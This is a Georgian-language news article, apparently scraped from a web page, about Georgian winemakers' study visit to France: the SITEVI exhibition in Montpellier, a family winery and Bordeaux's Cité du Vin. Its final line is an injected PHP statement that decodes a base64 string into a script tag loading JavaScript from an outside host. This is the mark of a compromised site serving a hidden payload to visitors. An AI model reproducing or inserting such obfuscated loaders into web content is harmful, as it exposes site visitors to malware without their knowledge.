celsiusi
ავერსი საქკაბელი
ღვინის ეროვნული სააგენტოსა და „Interco Nouvelle-Aquitaine“-ის მხარდაჭერით, საფრანგეთში ქართველი მეღვინეების სასწავლო ვიზიტი განხორციელდა.
 
ღვინის ეროვნულ სააგენტოსა და საერთაშორისო თანამშრომლობის სააგენტოს „Interco Nouvelle-Aquitaine“ ერთობლივი პროექტი მიზნად ისახავს ქართველ და ფრანგ ღვინის მწარმოებლებს შორის გამოცდილების გაზიარებასა და თანაშრომლობის ხელშეწყობას; პროექტი განსაკუთრებით მნიშვნელოვანია ქართული ღვინისა და კულტურის საფრანგეთში პოპულარიზაციისთვის. 
 
პროექტის ფარგლებში, ქართველი მეღვინეები საფრანგეთის ქალაქ მონპელიეში საერთაშორისო გამოფენაზე „SITEVI” ტექნიკურ კონფერენციებსა და ფრანგული ღვინის სექტორის შესახებ ტრენინგებს დაესწრნენ, გამართეს ბიზნეს (B2B) შეხვედრები, გაეცნენ ინფორმაციას მევენახეობა-მეღვინოების დარგში ახალი ტექნოლოგიებისა და ინოვაციების შესახებ, დაათვალიერეს საგვარეული მეღვინეობა Domaine de Rieucoulon.
 
ქართველი მეღვინეები, ქალაქ ბორდოში, ღვინის ცივილიზაციის მსოფლიო ცენტრშიც - Cité du Vin იმყოფებოდნენ. ცენტრი 2017 წელს გაიხსნა და პირველი მასპინძელი ქვეყანა სწორედ საქართველო იყო გამოფენით „საქართველო ღვინის სამშობლო“.  
 
981
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");